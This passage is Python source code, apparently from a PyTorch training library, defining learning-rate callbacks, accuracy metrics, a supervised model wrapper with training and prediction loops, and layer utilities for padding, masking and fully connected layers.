logs = logs or {}
current = logs.get(self.monitor)
if current is not None:
current = current[-1]
if current is None:
warnings.warn(
'Reduce LR on plateau conditioned on metric `%s` '
'which is not available. Available metrics are: %s' %
(self.monitor, ','.join(list(logs.keys()))), RuntimeWarning
)
else:
if self.in_cooldown():
self.cooldown_counter -= 1
self.wait = 0
if self.monitor_op(current, self.best):
self.best = current
self.wait = 0
elif not self.in_cooldown():
if self.wait >= self.patience:
reduced_lr = False
for param_group in self.optimizer.param_groups:
old_lr = param_group['lr']
if old_lr > self.min_lr:
param_group['lr'] = max(old_lr * self.factor, self.min_lr)
reduced_lr = True
if reduced_lr:
self.cooldown_counter = self.cooldown
self.wait = 0
if self.verbose > 0:
print('\nEpoch %05d: ReduceLROnPlateau reducing learning rate by %s factor.' % (
epoch + 1, self.factor))
self.wait += 1
def in_cooldown(self):
return self.cooldown_counter > 0
class LRScheduler(Callback):
def __init__(self, optimizer, schedule, verbose=0):
super().__init__()
self.optimizer = optimizer
self.schedule = schedule
self.verbose = verbose
def on_epoch_begin(self, epoch, train_logs=None, val_logs=None):
new_lr = self.schedule(epoch)
for param_group in self.optimizer.param_groups:
param_group['lr'] = new_lr
if self.verbose > 0:
print('\nEpoch %05d: LRScheduler setting lr to %s.' % (epoch + 1, new_lr))
"""
METRICS
Files Included:
__init__.py
abstract_metrics.py
accuracy_metrics.py
Missing Files:
segmentation_metrics.py
"""
class Metric(object):
"""
The abstract metric that defines the metric API. Some notes on it:
- Passing a function of the form `metric(y_pred, y_true)` to an abstract
metric will use that function to calculate the score on a batch.
- The accumulate method is called at the end of each batch to calculate the
aggregate score over the entire epoch thus far.
- See `AverageMetric` for an example of what an accumulate method might
look like.
- The reset method is called at the end of each epoch or validation run. It
simply overwrites the attributes of the metric with its attributes at
initialization.
Metrics are callable like any function and take as input:
```
batch_score = metric(y_pred, y_true)
```
where `y_true` are the labels for the batch and `y_pred` are the
predictions
To implement your own custom metric, override the `score` function and
the `accumulate` function. If you just want to average the scores over
the epoch, consider using `AverageMetric` and just overriding the `score`
function.
"""
def __init__(self, metric_func=None):
self.metric_func = metric_func
self.__name__ = self.__class__.__name__.lower() \
if metric_func is None else metric_func.__name__
self.__original_dict__ = None
def __call__(self, y_pred, y_true):
"""
Makes the metric a callable function. Used by some metrics to perform
some overhead work like checking validity of the input, or storing
values like batch size or input shape.
"""
# Save the original dict on the first call
if self.__original_dict__ is None:
self.__original_dict__ = copy.deepcopy(self.__dict__)
# Default metric will just score the predictions
return self.score(y_pred, y_true)
def score(self, y_pred, y_true):
"""
Calculates the metric score over a batch of labels and predictions.
Args:
y_pred: The predictions for the batch
y_true: The labels for the batch
Returns:
The metric score calculated over the batch input as a scalar
torch tensor.
"""
if self.metric_func is not None:
return self.metric_func(y_pred, y_true)
else:
raise NotImplementedError()
def accumulate(self):
"""
"""
raise NotImplementedError()
def reset(self):
if self.__original_dict__ is not None:
self.__dict__ = copy.deepcopy(self.__original_dict__)
return self
class AverageMetric(Metric):
"""
An abstract metric that accumulates the batch values from the metric
by averaging them together. If any function is input into the fit
function as a metric, it will automatically be considered an AverageMetric.
"""
def __init__(self, metric_func=None):
super(AverageMetric, self).__init__(metric_func=metric_func)
self.metric_sum = 0.
self.sample_count = 0
def __call__(self, y_pred, y_true):
assert y_true.size(0) == y_pred.size(0), "Batch size of labels and " \
"predictions must match for AverageMetric."
score = super(AverageMetric, self).__call__(y_pred, y_true)
self.sample_count += y_pred.size(0)
self.metric_sum += (score.item() * y_pred.size(0))
return score
def accumulate(self):
return self.metric_sum / self.sample_count
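# Example (sketch): a custom metric that is averaged over the epoch. Only the
# per-batch score needs to be defined; accumulation is handled by AverageMetric.
#
#   class MAE(AverageMetric):
#       def score(self, y_pred, y_true):
#           return (y_pred - y_true).abs().mean()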
class Accuracy(AverageMetric):
"""
Computes the accuracy over predictions
Args:
None
Returns:
An accuracy metric that can maintain its own internal state.
Inputs:
y_pred (torch.FloatTensor): A 2D Float Tensor with the predicted
probabilites for each class.
y_true (torch.LongTensor): A 1D torch LongTensor of the correct classes
Outputs:
A scalar tensor equal to the accuracy of the y_pred
"""
def score(self, y_pred, y_true):
# Expect output and target to be B x 1 or B x C or target can be
# B (with ints from 0 to C-1)
assert y_pred.dim() == 2, "y_pred should be a 2-dimensional tensor"
total = y_true.size(0)
# Turn it into a 1d class encoding
if y_true.dim() == 2:
if y_true.size(1) > 1:
raise NotImplementedError(
"Multiclass with 2d targets is not impelemented yet")
y_true = y_true.squeeze(1).long()
# Change the y_pred to have two cols if it only has 1
if y_pred.size(1) == 1:
# Want to consider the 0.5 case
y_pred = (y_pred >= 0.5).float()
y_pred = torch.cat([1 - y_pred, y_pred], dim=1)
# Compute the accuracy
_, predicted = torch.max(y_pred, 1)
correct = (predicted == y_true).float().sum(0)
return (correct / total) * 100.
class AccuracyWithLogits(Accuracy):
"""An accuracy metric that takes as input the logits. See `Accuracy` for
more details.
"""
def score(self, y_pred, y_true):
if y_pred.dim() == 2 and y_pred.size(1) > 1:
y_pred = F.softmax(y_pred, dim=1)
else:
y_pred = torch.sigmoid(y_pred)
return super().score(y_pred, y_true)
class TopKAccuracy(Accuracy):
"""Computes the precision@k for the specified values of k
Args:
k (int): The k to calculate precision@k (topk accuracy)
Returns:
A TopKAccuracy metric that can maintain its own internal state.
Inputs:
y_pred (torch.FloatTensor) A 2D Float Tensor with the predicted
probabilites for each class.
y_true (torch.LongTensor) A 1D torch LongTensor of the correct classes
Outputs:
A scalar tensor equal to the topk accuracy of the y_pred
"""
def __init__(self, k=3):
super().__init__()
self.k = k
def score(self, y_pred, y_true):
assert y_true.dim() == y_pred.dim() - 1 == 1
channel_dim = 1
batch_size = y_true.size(0)
# Check to see if there's only 1 channel (then its binary
# classification)
if y_pred.size(channel_dim) == 1:
y_pred = y_pred.squeeze(channel_dim) # B x ...
# B x ... -> B x 2 x ...
y_pred = torch.stack([1 - y_pred, y_pred], dim=1)
# Get the indicies of the topk along the channel dim
_, pred = y_pred.topk(self.k, channel_dim, True, True) # B x k x ...
pred = pred.t() # k x B x ...
# target: B -> 1 x B -> k x B x ...
correct = pred.eq(y_true.view(1, -1).expand_as(pred))
correct_k = correct[:self.k].view(-1).float().sum(0)
# Accumulate results
return 100. * correct_k / batch_size
accuracy = Accuracy()
accuracy_with_logits = AccuracyWithLogits()
top2_accuracy = TopKAccuracy(2)
top3_accuracy = TopKAccuracy(3)
top5_accuracy = TopKAccuracy(5)
register_metric('accuracy', accuracy)
register_metric('accuracy_with_logits', accuracy_with_logits)
register_metric('top2_accuracy', top2_accuracy)
register_metric('top3_accuracy', top3_accuracy)
register_metric('top5_accuracy', top5_accuracy)
"""
MODELS
"""
python_iterables = {list, set, tuple, frozenset}
def peek(iterable):
try:
first = next(iterable)
except StopIteration:
return None
return first, itertools.chain([first], iterable)
def standardize_list_input(inputs):
if type(inputs) in python_iterables:
return list(inputs)
return [inputs]
def standardize_metric_input(metrics):
old_metrics = standardize_list_input(metrics)
metrics = []
for metric in old_metrics:
if isinstance(metric, str):
metrics.append(load_metric(metric))
elif isinstance(metric, Metric):
metrics.append(metric)
else:
metrics.append(AverageMetric(metric))
return metrics
# TODO Not sure whether I'll need to separate RL models and SL models.
# Hopefully I planned this out right
class SLModel(nn.Module):
def __init__(self, torch_module=None):
super(SLModel, self).__init__()
self.to_cuda = use_cuda
self.loss_in = []
self.torch_module = torch_module
self.loss_manager = LossManager()
self.optimizer_manager = OptimizerManager()
def infer_inputs(self, *inputs, **kwargs):
self.cast_model_to_cuda()
with torch.no_grad():
self.forward(*inputs, **kwargs)
def parameters(self, *args, **kwargs):
params = super(SLModel, self).parameters(*args, **kwargs)
param_peek = peek(params)
if param_peek is None:
warnings.warn("Model has no parameters! Did you forget to call "
"infer_inputs?")
return []
return param_peek[1]
def forward(self, *inputs, **kwargs):
if self.torch_module is not None:
self.loss_in = self.torch_module.forward(*inputs, **kwargs)
return self.loss_in
raise NotImplementedError()
def cast_input_to_torch(self, x):
return Variable(from_numpy(x))
def cast_target_to_torch(self, y):
return Variable(from_numpy(y))
def cast_output_to_numpy(self, preds):
return preds.data.cpu().numpy()
def cast_model_to_cuda(self):
if self.to_cuda:
self.cuda()
self.to_cuda = False
return
def add_optimizer(self, optimizer, name=None):
self.optimizer_manager.add_optimizer(optimizer, name=name)
def remove_optimizer(self, name=None):
return self.optimizer_manager.remove_optimizer(name=name)
def clear_optimizers(self):
self.optimizer_manager.clear_optimizers()
def loss(self, targets):
return self.loss_manager.loss(self, targets)
def add_loss(self, loss_fn, inputs=(), weight=1.0, name=None):
inputs = standardize_list_input(inputs)
# Use 'loss_in' if no inputs provided
if not len(inputs):
inputs = ['loss_in']
return self.loss_manager.add_loss(loss_fn,
inputs,
weight=weight,
name=name)
def remove_loss(self, name=None):
return self.loss_manager.remove_loss(name=name)
def clear_losses(self):
self.loss_manager.clear_losses()
def compile_loss(self, loss_fn=None):
"""
This is a function to standardize loss input and hack it to behave like
a metric. A few key notes to remember:
- If the loss_fn is None, it will just use the loss method
defined by the model. This by default comes from the loss manager
which is modified by the add_loss, remove_loss, and clear_losses
methods. If a loss_fn is provided, then this method will clear
all current losses from the loss manager and add the input loss
function to it, taking as input the default "loss_in" parameter.
If you override the model's loss function, then passing a loss_fn
will have no effect!
- If there is more than one loss in the loss manager, then this
function will also return metric versions of all the auxiliary
losses. The overall loss function is only computed once;
the auxiliary loss scores are taken from the loss cache.
Args:
loss_fn: The loss function to compile. Defaults to None. See above
note for explanation of behavior when None and when not None.
Returns:
(tuple): All the relevant loss functions in a tuple. See above note
for more explanation about how this return value is determined
"""
# if loss_fn is defined, clear the losses, and set it to the input
# loss_fn
if loss_fn is not None:
if len(self.loss_manager):
warnings.warn("Loss manager is not empty, but loss_fn passed "
"passed to fit_generator or validate_generator."
" Clearing all past losses.")
self.clear_losses()
self.add_loss(loss_fn)
# Compile the main loss
def loss(preds, targets):
# Preds are not used; this just makes the loss behave like a metric
return self.loss(targets)
# Compile the auxiliary losses; the main loss must be called before
# the auxiliary losses
aux_losses = []
# Only account for auxiliary losses if there is more than one loss
if len(self.loss_manager) > 1:
for name in self.loss_manager.names:
# Using the default value gets around the problem of late
# binding.
# https://stackoverflow.com/questions/3431676/creating-functions-in-a-loop
def aux_loss(preds, targets, name=name):
# Preds are not used; this is a hack to make the loss
# behave like a metric
return self.loss_manager.get_loss_score(name=name)
metric_aux_loss = AverageMetric(aux_loss)
# Change the name for logging
metric_aux_loss.__name__ = name
aux_losses.append(metric_aux_loss)
return (AverageMetric(loss), *aux_losses)
def train_on_batch(self, x, target, optimizers, loss_fn, metrics=()):
"""
Trains the SLModel on a single batch of data.
Args:
x: A batch of input into the model.
target: The corresponding labels for the batch x.
optimizers: A list of optimizers to run with the model.
loss_fn: The loss function to run on the model
metrics: A list of metrics to calculate on the output of the model
Returns:
A tuple where the first element is the loss over the batch and the
second element is a list of the scores corresponding to the input
metrics.
"""
self.cast_model_to_cuda()
self.train()
# Cast inputs to a torch variable
torch_x = self.cast_input_to_torch(x)
torch_target = self.cast_target_to_torch(target)
# Make the prediction
torch_preds = self(torch_x)
# Calculate the loss
loss = loss_fn(torch_preds, torch_target)
# Update the weights
[optimizer.zero_grad() for optimizer in optimizers]
loss.backward()
[optimizer.step() for optimizer in optimizers]
# Calculate the metrics
metric_scores = [
metric(torch_preds, torch_target) for metric in metrics
]
# Clean up some variables
self.zero_grad()
del torch_x
del torch_target
del torch_preds
if use_cuda:
torch.cuda.empty_cache()
return loss, metric_scores
def validate_on_batch(self, x, target, metrics):
self.cast_model_to_cuda()
self.eval()
with torch.no_grad():
# Cast inputs to torch tensors (gradients are disabled by no_grad)
torch_x = self.cast_input_to_torch(x)
torch_target = self.cast_target_to_torch(target)
# Make the prediction
torch_preds = self(torch_x)
preds = self.cast_output_to_numpy(torch_preds)
# Calculate the metrics
metric_scores = [
metric(torch_preds, torch_target) for metric in metrics
]
# Clean up some variables
del torch_x
del torch_preds
del torch_target
if use_cuda:
torch.cuda.empty_cache()
return metric_scores, preds
def validate_generator(self,
val_generator,
validation_steps,
loss_fn=None,
metrics=(),
verbose=0):
self.cast_model_to_cuda()
metrics = standardize_metric_input(metrics)
if loss_fn is not None or len(self.loss_manager):
loss_fn, *aux_loss_fns = self.compile_loss(loss_fn)
metrics = [loss_fn] + metrics + aux_loss_fns
# Set up the logs
logs = TrainingLogs()
# Set the model to eval mode
self.eval()
callbacks = [ProgressBar(validation_steps)] if verbose > 0 else []
callbacks = CallbackList(callbacks)
callbacks.on_train_begin(logs=logs)
callbacks.on_epoch_begin(0, logs=logs.epoch_logs)
for step in range(validation_steps):
callbacks.on_batch_begin(epoch=0, step=step, logs=logs.batch_logs)
x, target = next(val_generator)
b_metrics, _ = self.validate_on_batch(x, target, metrics)
for metric, score in zip(metrics, b_metrics):
logs.log_metric(metric, score)
callbacks.on_batch_end(epoch=0, step=step, logs=logs.batch_logs)
callbacks.on_epoch_end(0, logs=logs.epoch_logs)
callbacks.on_train_end(logs=logs)
return logs.epoch_logs
def fit_generator(self,
generator,
steps_per_epoch,
epochs,
validation_data=None,
validation_steps=0,
metrics=(),
callbacks=(),
initial_epoch=0,
verbose=1):
self.cast_model_to_cuda()
# Standardize the input
optimizers = self.optimizer_manager.optimizers
loss_fn, *aux_loss_fns = self.compile_loss()
metrics = standardize_metric_input(metrics) + aux_loss_fns
callbacks = CallbackList(callbacks)
# If the verbosity is set, set up the progress bar
if verbose > 0:
callbacks.append(ProgressBar(steps_per_epoch, epochs=epochs))
# Register the model with each callback
callbacks.set_model(self)
# Save whether we will need to run validation
run_validation = (validation_steps >
0) and validation_data is not None
logs = TrainingLogs()
# Run the callbacks
callbacks.on_train_begin(logs=logs)
# Loop through all the epochs
for epoch in range(initial_epoch, epochs):
# Put the model in train mode
self.train()
# Reset the metrics
loss_fn = loss_fn.reset()
metrics = [metric.reset() for metric in metrics]
# Run the callbacks
logs.on_epoch_begin()
callbacks.on_epoch_begin(epoch, logs=logs.epoch_logs)
# Run each step of the epoch with a progress bar
for step in range(steps_per_epoch):
# Run the callbacks
callbacks.on_batch_begin(
epoch=epoch, step=step, logs=logs.batch_logs)
x, target = next(generator)
b_loss, b_metrics = self.train_on_batch(
x, target, optimizers, loss_fn, metrics)
# Add stats to the logs
logs.log_metric(loss_fn, b_loss)
for score, metric in zip(b_metrics, metrics):
logs.log_metric(metric, score)
# Run the callbacks
callbacks.on_batch_end(
epoch=epoch, step=step, logs=logs.batch_logs)
# Check if we need to run validation
if run_validation:
loss_fn = loss_fn.reset()
metrics = [metric.reset() for metric in metrics]
self.validate_generator(
validation_data,
validation_steps,
metrics=([loss_fn] + metrics))
# Log the loss and metrics
for metric in [loss_fn] + metrics:
logs.log_validation_metric(metric)
# Run the callbacks
logs.on_epoch_end()
callbacks.on_epoch_end(epoch, logs=logs.epoch_logs)
# Run the callbacks
callbacks.on_train_end(logs=logs)
# Put the model back in eval mode
self.eval()
return logs
def predict_on_batch(self, x):
self.cast_model_to_cuda()
self.eval()
with torch.no_grad():
# Cast inputs to torch tensors (gradients are disabled by no_grad)
torch_x = self.cast_input_to_torch(x)
# Make the prediction
torch_preds = self(torch_x)
preds = self.cast_output_to_numpy(torch_preds)
self.zero_grad()
del torch_x
del torch_preds
if use_cuda:
torch.cuda.empty_cache()
# cast to numpy and return
return preds
def predict_generator(self, generator, prediction_steps, verbose=0):
self.cast_model_to_cuda()
self.eval()
preds = []
# Loop through all the steps
progbar = tqdm if verbose > 0 else lambda x: x
for _ in progbar(range(prediction_steps)):
x = next(generator)
batch_preds = self.predict_on_batch(x)
# Check to make sure the ndim is the same
if len(preds) > 0:
assert batch_preds.ndim == preds[-1].ndim
preds.append(batch_preds)
# Supports variable sized predictions - get the biggest possible shape
num_preds = sum(len(batch_preds) for batch_preds in preds)
max_shape = [num_preds] + [
max(preds[n].shape[i] for n in range(len(preds)))
for i in range(1, preds[0].ndim)
]
full_preds = np.zeros(max_shape, dtype=preds[0].dtype)
# Fill in the predictions array
cur_pred_ind = 0
for batch_preds in preds:
preds_slice = (slice(cur_pred_ind,
cur_pred_ind + len(batch_preds)), ) + tuple(
slice(batch_preds.shape[i])
for i in range(1, batch_preds.ndim))
full_preds[preds_slice] = batch_preds
cur_pred_ind += len(batch_preds)
return full_preds
def save_state(self, save_path):
return torch.save(self.state_dict(), save_path)
def load_state(self, load_path):
self.load_state_dict(torch.load(load_path))
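# Example (sketch): assembling and training an SLModel. Every name below
# (my_network, traingen, valgen, testgen, the hyperparameters) is a placeholder
# for the caller's own objects, not a library default.
#
#   model = SLModel(torch_module=my_network)   # wrap an existing nn.Module
#   model.add_optimizer(torch.optim.Adam(model.parameters(), lr=1e-3))
#   model.add_loss(F.cross_entropy)            # applied to model.loss_in
#   logs = model.fit_generator(traingen, steps_per_epoch=100, epochs=10,
#                              validation_data=valgen, validation_steps=20,
#                              metrics=["accuracy"])
#   preds = model.predict_generator(testgen, prediction_steps=10)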
"""
LAYERS
Files Included:
layer_utils.py
layer.py
functions.py
core.py
merge.py
noise.py
pooling.py
convolutional.py
recurrent.py
attentional.py
"""
# layer_utils.py
pool_types = {"no_pool": lambda *args, **kwargs: lambda x: x,
"max": nn.MaxPool1d,
"avg": nn.AvgPool1d}
activation_types = {name.lower(): cls for name, cls in nn.modules.activation.__dict__.items() if isinstance(cls, type)}
activation_types["linear"] = None
def get_type(item_type, type_dict, fail_message):
try:
if not isinstance(item_type, str):
return item_type
return type_dict[item_type]
except KeyError:
raise NotImplementedError(fail_message)
def get_pool_type(pool_type):
return get_type(pool_type, pool_types, "pool type %s" % pool_type)
def get_activation_type(activation_type):
return get_type(activation_type, activation_types, "Activation %s" % activation_type)
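# Example (sketch): both lookups accept either a string or an already-resolved
# type, so layer constructors can take "relu" / nn.ReLU interchangeably.
#
#   get_activation_type("relu")   # -> nn.ReLU
#   get_activation_type(nn.ReLU)  # -> nn.ReLU (passed through)
#   get_pool_type("max")          # -> nn.MaxPool1d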
def construct_n_layers(layer_factory, num_layers, input_size, output_size, *args, **kwargs):
layers = nn.ModuleList([layer_factory(input_size, output_size, *args, **kwargs)])
for _ in range(num_layers - 1):
layers.append(layer_factory(output_size, output_size, *args, **kwargs))
return layers
def get_input_shape(inputs):
return tuple(inputs.size())[1:]
def builder(func):
def build_layer(self, *args, **kwargs):
assert not self.built, "Cannot build a layer multiple times!"
func(self, *args, **kwargs)
if use_cuda:
self.cuda()
self.built = True
return build_layer
# layer.py
class Layer(nn.Module):
def __init__(self):
super(Layer, self).__init__()
self.built = False
def forward(self, *input):
raise NotImplementedError()
def reset_parameters(self):
pass
def __str__(self):
return self.__class__.__name__ + "()"
def __repr__(self):
return str(self)
# functions.py
# TODO: Add a cropping function
def pad_tensor(tensor, length, pad_value=0.0, dim=0):
# tensor is Li x E
tensor = tensor.transpose(0, dim).contiguous()
if tensor.size(0) > length:
# Truncate; the leading transpose is undone before returning below
tensor = tensor[:length]
elif tensor.size(0) < length:
tensor = torch.cat([tensor, Variable(zeros(length - tensor.size(0), *tensor.size()[1:]).fill_(pad_value),
requires_grad=False)])
return tensor.transpose(0, dim).contiguous()
def pad_sequences(tensors, pad_value=0.0, length_last=False):
# tensors is B x Li x E
# First find how long we need to pad until
length_dim = -1 if length_last else 0
assert len(tensors) > 0
if length_last:
assert all(tuple(seq.size())[:-1] == tuple(tensors[0].size())[:-1] for seq in tensors)
else:
assert all(tuple(seq.size())[1:] == tuple(tensors[0].size())[1:] for seq in tensors)
seq_lens = [seq.size(length_dim) for seq in tensors]
max_len = max(seq_lens)
# Out is B x L x E
# print([tuple(pad_tensor(tensors[i], max_len).size()) for i in range(len(tensors))])
if length_last:
return torch.stack(
[pad_tensor(tensors[i].transpose(0, length_dim), max_len, pad_value=pad_value).transpose(0, length_dim)
for i in range(len(tensors))]), seq_lens
return torch.stack([pad_tensor(tensors[i], max_len, pad_value=pad_value) for i in range(len(tensors))]), seq_lens
def unpad_sequences(padded_tensors, seq_lens, length_last=False):
length_dim = -1 if length_last else 0
if length_last:
return [padded_tensor.transpose(0, length_dim)[:seq_len].transpose(0, length_dim) for padded_tensor, seq_len in
zip(padded_tensors, seq_lens)]
return [padded_tensor[:seq_len] for padded_tensor, seq_len in zip(padded_tensors, seq_lens)]
def pack_sequences(tensors):
# tensors is B x Li x E
assert len(tensors) > 0
assert all(seq.size(1) == tensors[0].size(1) for seq in tensors)
seq_lens = [seq.size(0) for seq in tensors]
return torch.cat(tensors), seq_lens
def unpack_sequences(packed_tensors, seq_lens):
# Find the start inds of all of the sequences
seq_starts = [0]
for seq_len in seq_lens[:-1]:
seq_starts.append(seq_starts[-1] + seq_len)
# Unpack the tensors
return [packed_tensors[seq_starts[i]:seq_starts[i] + seq_lens[i]] for i in range(len(seq_lens))]
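# Example (sketch): pad/unpad and pack/unpack are inverse pairs for a list of
# B tensors of shape Li x E.
#
#   seqs = [torch.randn(3, 8), torch.randn(5, 8)]
#   padded, lens = pad_sequences(seqs)   # padded: 2 x 5 x 8, lens: [3, 5]
#   restored = unpad_sequences(padded, lens)
#   packed, lens = pack_sequences(seqs)  # packed: 8 x 8 (3 + 5 rows)
#   restored = unpack_sequences(packed, lens)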
def kmax_pooling(x, dim, k):
index = x.topk(min(x.size(dim), k), dim=dim)[1].sort(dim=dim)[0]
x = x.gather(dim, index)
if x.size(dim) < k:
x = pad_tensor(x, k, dim=dim)
return x
def pad_numpy_to_length(x, length):
if len(x) < length:
return np.concatenate([x, np.zeros((length - len(x),) + x.shape[1:])], axis=0)
return x
def pad_numpy_to_shape(x, shape):
pad_diffs = [length - x_len for x_len, length in zip(x.shape, shape)]
pad_args = [(0, pad_diff) for pad_diff in pad_diffs] + [(0, 0)] * (x.ndim - len(shape))
return np.pad(x, pad_args, mode='constant')
def create2d_mask(x, seq_lens):
# seq_lens are of shape B x 2
# x is of shape B x H x W x F
# shape is B x H x 1 x 1
seq_lens_heights = seq_lens.view(-1, 2, 1, 1)[:, 0:1]
seq_lens_widths = seq_lens.view(-1, 1, 2, 1)[:, :, 1:2]
mask_height = Variable((arange(x.size(1)).long().view(1, -1, 1, 1) >= seq_lens_heights),
requires_grad=False)
# shape is B x 1 x W x 1
mask_width = Variable((arange(x.size(2)).long().view(1, 1, -1, 1) >= seq_lens_widths),
requires_grad=False)
# shape is B x H x W x 1
mask = mask_height | mask_width
return mask
def seq_softmax(x, return_padded=False):
# x comes in as B x Li x F, we compute the softmax over Li for each F
x, lens = pad_sequences(x, pad_value=-float('inf')) # B x L x F
shape = tuple(x.size())
assert len(shape) == 3
x = F.softmax(x, dim=1)
assert tuple(x.size()) == shape
if return_padded:
return x, lens
# Un-pad the tensor and return
return unpad_sequences(x, lens) # B x Li x F
# core.py
# TODO Create abstract layers for layers with params that includes weight regularizers
def Input(*input_shape):
# Use 1 for the batch size
return zeros(1, *input_shape)
def build_fully_connected(units, input_shape, use_bias=True,
activation='linear', num_layers=1, batchnorm=False,
input_dropout=0.0, dropout=0.0):
assert len(input_shape) == 1, "Input to FullyConnected layer " \
"can only have 1 dimension. {} has {} dimensions" \
"".format(input_shape, len(input_shape))
input_size, output_size = input_shape[0], units
layer = nn.Sequential()
if input_dropout:
layer.add_module(name="input-dropout", module=nn.Dropout(input_dropout))
for i in range(num_layers):
layer_input = input_size if i == 0 else output_size
layer.add_module(name="fullyconnected-%s" % i, module=nn.Linear(layer_input, output_size, bias=use_bias))
if activation != "linear":
layer.add_module(name="{}-{}".format(activation, i), module=get_activation_type(activation)())
if batchnorm:
layer.add_module(name="batchnorm-%s" % i, module=nn.BatchNorm1d(output_size))
if dropout:
layer.add_module(name="dropout-%s" % i, module=nn.Dropout(dropout))
logging.info("Creating layer: %r" % layer)
return layer
class FullyConnected(Layer):
"""Just your regular fully-connected NN layer.
`FullyConnected` implements the operation:
`output = activation(dot(input, kernel) + bias)`
where `activation` is the element-wise activation function
passed as the `activation` argument, `kernel` is a weights matrix
created by the layer, and `bias` is a bias vector created by the layer
(only applicable if `use_bias` is `True`).
Note: if the input to the layer has a rank greater than 2, then
it is flattened prior to the initial dot product with `kernel`.
# Example
```python
# A layer that takes as input tensors of shape (*, 128)
# and outputs tensors of shape (*, 64); the input shape is
# inferred on the first forward call
layer = FullyConnected(64)
tensor = torch.randn(32, 128)
output = layer(tensor)
```
# Arguments
units: Positive integer, dimensionality of the output space.
input_shape: Tuple giving the shape of a single input sample
(inferred from the first forward call if not given).
activation: String, Name of activation function to use
(supports "tanh", "relu", and "linear").
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
# Input shape
2D tensor with shape: `(batch_size, input_size)`.
# Output shape
2D tensor with shape: `(batch_size, output_size)`.
"""
def __init__(self, units, input_shape=None,
use_bias=True, activation='linear', num_layers=1,
batchnorm=False,
input_dropout=0.0, dropout=0.0):
super(FullyConnected, self).__init__()
self.units = units
self.input_shape = input_shape
self.activation = activation
self.use_bias = use_bias
self.num_layers = num_layers
self.batchnorm = batchnorm
self.input_dropout = input_dropout
self.dropout = dropout
# We'll initialize the layers in the first forward call
self.layers = []
@builder
def __build_layer(self, inputs):
if self.input_shape is None:
self.input_shape = get_input_shape(inputs)
self.layers = build_fully_connected(
self.units, self.input_shape, use_bias=self.use_bias,
activation=self.activation, num_layers=self.num_layers,
batchnorm=self.batchnorm, input_dropout=self.input_dropout,
dropout=self.dropout
)
def forward(self, inputs):
if not self.built:
self.__build_layer(inputs)
return self.layers(inputs)
def reset_parameters(self):
for layer in self.layers:
if isinstance(layer, nn.BatchNorm1d) or isinstance(layer, nn.Linear):
logging.info("Resetting layer %s" % layer)
layer.reset_parameters()
def __str__(self):
return "%r" % self.layers
class Flatten(Layer):
"""Flattens the input. Does not affect the batch size.
# Example
```python
flatten = Flatten()
tensor = torch.randn(32, 2, 3)
# The output will be of shape (32, 6)
output = flatten(tensor)
```
"""
def __init__(self):
super(Flatten, self).__init__()
def __str__(self):
return "Flatten"
def forward(self, x):
return flatten(x)
class Lambda(Layer):
"""Wraps arbitrary expression as a `Module` object. The input function must
have a self argument first!
# Examples
```python
# add a x -> x^2 layer
layer = Lambda(lambda self, x: x ** 2)
```
```python
# add a layer that returns the concatenation
# of the positive part of the input and
# the opposite of the negative part
def antirectifier(self, x):
x = self.fc(x)
x -= torch.mean(x, dim=1, keepdim=True)
pos = F.relu(x)
neg = F.relu(-x)
return torch.cat([pos, neg], dim=1)
layer = Lambda(antirectifier, fc=Linear(256, 128))
```
# Arguments
forward: The function to be evaluated. Should take self (the lambda object) as first argument
layers: optional dictionary of keyword arguments that map layer names to already initialized layers.
These layers will be accessible in the forward function as 'self.[LAYER_NAME]', where
[LAYER_NAME] is the name of the layer you want to access.
"""
def __init__(self, forward, **layers):
super(Lambda, self).__init__()
for layer_name in layers:
setattr(self, layer_name, layers[layer_name])
self.layer_names = list(layers.keys())
self.forward_func = forward
self.string = "Lambda: [" + " ".join("%r" % getattr(self, layer_name) for layer_name in self.layer_names) + "]"
def __str__(self):
return self.string
def forward(self, *args, **kwargs):
return self.forward_func(self, *args, **kwargs)
def reset_parameters(self):
for layer_name in self.layer_names:
getattr(self, layer_name).reset_parameters()
class MaskedInput(Layer):
"""
A layer that takes in sequences of variable length as inputs that have
been padded. This layer will take as input a padded torch tensor where the sequence
length varies along the first dimension of each sample as well as a LongTensor of lengths of
each sequence in the batch. The layer will mask the padded regions of the output of the layer
to cut the gradient.
# Arguments
mask_value: The value to mask the padded input with. If passed "min" instead of a value, this will
mask with the smallest value in the batch minus 1 (useful if passing to a max pooling layer).
This defaults to 0.
"""
def __init__(self, mask_value=0.):
super(MaskedInput, self).__init__()
if mask_value == 'min':
self.mask_value_factory = lambda x: torch.min(x.data) - 1.
else:
self.mask_value_factory = lambda x: mask_value
self.mask_value = mask_value
self.__descriptor = self.__class__.__name__ + "(mask_value=%s)" % self.mask_value
logging.info("Creating layer: %s" % self.__descriptor)
def forward(self, x, seq_lens):
mask = Variable((arange(x.size(1)).long().view(1, -1, 1) >= seq_lens.view(-1, 1, 1)), requires_grad=False)
mask_value = self.mask_value_factory(x)
return x.masked_fill(mask, mask_value)
def __str__(self):
return self.__descriptor
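# Example (hedged usage sketch): mask padded timesteps before a max pool so the
# padding cannot win the max, assuming x is a padded B x L x F tensor and
# seq_lens is a LongTensor of per-sample lengths:
#
#     masker = MaskedInput(mask_value='min')
#     x_masked = masker(x, seq_lens)         # padded positions become min(x) - 1
#     pooled = torch.max(x_masked, dim=1)[0]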
class MaskedInput2D(MaskedInput):
"""
A layer that takes in sequences of variable length as inputs that have
been padded. This layer will take as input a padded torch tensor where the sequence
length varies along the first dimension of each sample as well as a LongTensor of lengths of
each sequence in the batch. The layer will mask the padded regions of the output of the layer
to cut the gradient.
# Arguments
mask_value: The value to mask the padded input with. If passed "min" instead of a value, this will
mask with the smallest value in the batch minus 1 (useful if passing to a max pooling layer).
This defaults to 0.
"""
def forward(self, x, seq_lens):
# seq_lens are of shape B x 2
# x is of shape B x H x W x F
mask = create2d_mask(x, seq_lens)
mask_value = self.mask_value_factory(x)
return x.masked_fill(mask, mask_value)
def __str__(self):
return self.__descriptor
# merge.py
class Concatenate(Layer):
"""Layer that concatenates a list of inputs.
It takes as input a list of tensors, all of the same shape except
for the concatenation dim, and returns a single tensor: the
concatenation of all inputs. The dim argument is interpreted
relative to the non-batch dimensions (non-negative values are
shifted by one to skip the batch dimension).
"""
def __init__(self):
super(Concatenate, self).__init__()
def forward(self, seq, dim=-1):
if dim >= 0:
dim += 1
return torch.cat(seq, dim=dim)
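# Example (hedged sketch of the dim offset above): a non-negative dim is shifted
# by one so callers can ignore the batch dimension:
#
#     cat = Concatenate()
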